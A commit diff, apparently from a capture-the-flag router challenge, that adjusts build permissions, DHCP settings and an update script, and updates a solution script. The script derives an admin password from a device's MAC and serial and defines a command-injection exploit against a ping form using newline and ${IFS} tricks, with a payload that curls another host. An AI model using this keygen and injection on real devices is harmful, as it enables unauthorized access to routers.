DNS is useless; fix tar path in update.sh

buildroot/board/tiesse/tgr/permissions.config

@@ -4,4 +4,4 @@
 /update.sh f 755 root root - - - - -
 /root/ d 700 root root - - - - - 
 /root/.ssh/ d 700 root root - - - - -
-/root/.ssh/authorized_keys 644 root root - - - - -
+/root/.ssh/authorized_keys f 644 root root - - - - -

conf/etc/dhcp/dhcpd.conf

@@ -1,6 +1,6 @@
 default-lease-time 600;
 max-lease-time 14400;
-option domain-name-servers 1.1.1.1; 
+#option domain-name-servers 1.1.1.1; 
 option subnet-mask 255.255.255.0;
 option broadcast-address 192.168.77.255;
 

solution/solution.py

@@ -1,40 +1,41 @@
-import requests
+import requests
-import hashlib
+import hashlib
-
+import sys
-def xorshift(x, y, z, w):
+
-    t = x
+def xorshift(x, y, z, w):
-    t = t ^ ((t << 11) & 0xFFFFFFFF)
+    t = x
-    t = t ^ (t >> 8)
+    t = t ^ ((t << 11) & 0xFFFFFFFF)
-    x, y, z = y, z, w
+    t = t ^ (t >> 8)
-    w = (w ^ (w >> 19)) ^ t
+    x, y, z = y, z, w
-    return x, y, z, w, t
+    w = (w ^ (w >> 19)) ^ t
-
+    return x, y, z, w, t
-def keygen(mac, serial):
+
-	l = 20
+def keygen(mac, serial):
-	password = ""
+	l = 20
-	md5a = hashlib.md5(mac).hexdigest()
+	password = ""
-	md5b = hashlib.md5(serial).hexdigest()
+	md5a = hashlib.md5(mac).hexdigest()
-	w = int(md5a[0:8], 16)
+	md5b = hashlib.md5(serial).hexdigest()
-	x = int(md5a[8:16], 16)
+	w = int(md5a[0:8], 16)
-	y = int(md5a[16:24], 16)
+	x = int(md5a[8:16], 16)
-	z = int(md5a[24:32], 16)
+	y = int(md5a[16:24], 16)
-
+	z = int(md5a[24:32], 16)
-	for i in range(0, l):
+
-		x, y, z, w, t = xorshift(x, y, z, w)
+	for i in range(0, l):
-		password += md5b[t % 20]
+		x, y, z, w, t = xorshift(x, y, z, w)
-
+		password += md5b[t % 20]
-	return password
+
-
+	return password
-def rce(username, password, host, payload):
+
-	requests.post("http://{}/utils.php".format(host), auth=auth(username, password), data={"action": "ping", "host": "127.0.0.1\n".format(payload.replace(' ', '${IFS}'))})
+def rce(username, password, host, payload):
-
+	requests.post("http://{}/utils.php".format(host), auth=auth(username, password), data={"action": "ping", "host": "127.0.0.1\n".format(payload.replace(' ', '${IFS}'))})
-def main():
+
-	serial = "D7F2959E8EE66CC06CB67C0D2B835273".encode("ascii")
+def main():
-	mac = "ac:35:ee:ad:29:1b".encode("ascii")
+	serial = sys.argv[1].encode("ascii")
-	host = "192.168.77.1"
+	mac = sys.argv[2].encode("ascii")
-	payload = "curl 192.168.1.2:8080"
+	host = "192.168.77.1"
-	password = keygen(mac, serial)
+	payload = "curl 192.168.77.10:8080"
-	print(password)
+	password = keygen(mac, serial)
-	#rce("admin", password, host, payload)
+	print(password)
-	
+	#rce("admin", password, host, payload)
-main()
+	
+main()

update/update.sh

@@ -32,7 +32,7 @@ if [ "$check" == "Verified OK" ]
 then
         /bin/echo "[+] Signature is valid!"
         /bin/echo "[+] Upgrading..."
-        /usr/bin/tar -xvzf /tmp/update.tgz.cc -C /
+        /bin/tar -xvzf /tmp/update.tgz.cc -C /
         /bin/rm /tmp/update.tgz.cc /tmp/sig
         /bin/echo "[+] Done"
         exit 0